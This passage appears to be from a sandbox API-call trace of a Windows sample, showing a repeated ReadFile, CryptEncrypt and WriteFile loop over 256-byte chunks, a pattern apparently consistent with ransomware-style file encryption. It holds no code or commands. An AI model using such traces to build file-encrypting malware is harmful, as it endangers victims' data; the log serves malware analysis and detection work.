returned 1 [0144.428] GetLastError () returned 0x0 [0144.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.428] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.428] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.428] GetLastError () returned 0x0 [0144.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.428] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.428] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.428] GetLastError () returned 0x0 [0144.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.428] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.428] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.428] GetLastError () returned 0x0 [0144.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.428] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.429] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.429] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.429] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.429] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.429] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.429] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.429] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.429] GetLastError () returned 0x0 [0144.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.430] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.430] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.430] GetLastError () returned 0x0 [0144.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.430] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.430] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.430] GetLastError () returned 0x0 [0144.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.430] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.430] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.430] GetLastError () returned 0x0 [0144.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.430] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.430] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.430] GetLastError () returned 0x0 [0144.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.430] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.430] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.430] GetLastError () returned 0x0 [0144.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.430] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.430] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.430] GetLastError () returned 0x0 [0144.430] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.431] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.431] GetLastError () returned 0x0 [0144.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.431] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.431] GetLastError () returned 0x0 [0144.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.431] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.431] GetLastError () returned 0x0 [0144.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.431] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.431] GetLastError () returned 0x0 [0144.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.431] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.431] GetLastError () returned 0x0 [0144.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.431] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.431] GetLastError () returned 0x0 [0144.431] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.431] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.432] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.432] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.432] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.432] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.432] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.432] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.432] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.432] GetLastError () returned 0x0 [0144.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.433] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.433] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.433] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.433] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 